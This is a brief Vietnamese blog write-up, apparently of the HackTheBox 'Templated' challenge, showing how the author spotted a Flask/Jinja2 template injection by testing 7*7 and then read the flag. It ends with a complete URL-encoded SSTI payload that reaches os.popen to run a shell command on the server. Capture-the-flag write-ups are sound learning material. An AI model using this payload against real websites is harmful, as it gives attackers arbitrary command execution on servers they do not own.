Avatar — August 19, 2021 in HackTheBox

Hackthebox Templated Ma Giáo

38 Likes Comment

Đây là phần code mình thấy khá là ma giáo khi chơi hackthebox, họ cho một trang nói t build bằng gì thôi thế là hết

Thực ra với mình thế là đủ vì từ khóa flask/jinja2 exploit sẽ cho mình kết quả mình cần

https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

tính thử 7*7 xem sao

chuẩn kết quả rồi thì phang thôi

flag nè

submit và kết quả

payload:

%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22cat%20flag.txt%22).read()%7D%7D
0 0 votes
Article Rating

You might like

HTB PDFy Writeups

HTB Userland City Writeups

CachedView Hackthebox Writeup

Toxic hackthebox Challenge

HackTheBox – Emdee five for life – Ai Nhanh Hơn Ai

Avatar

About the Author: Vô Ưu

Xin chào! Tôi là Vouu, người sáng lập blog này. Tôi là một người yêu thích. Tôi có một công việc ban ngày với tư cách là một chuyên viên bơm vá săm xe các loại, và trang web này là một trong những hoạt động yêu thích của tôi, đặc biệt là trong những lúc rảnh rỗi. Hy vọng bạn thích sử dụng trang web này, và nó sẽ mang lại cho bạn nhiều điều bổ ích. Phản hồi từ người đọc sẽ truyền cảm hứng cho tôi để tôi có thể viết được nhiều hơn nữa !. Bạn chỉ cần để lại nhận xét bên dưới nếu bạn thấy bài viết này hữu ích. Chúc bạn ngày mới tốt lành!
Subscribe
Notify of
guest
0 Comments
Most Voted
Newest Oldest
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x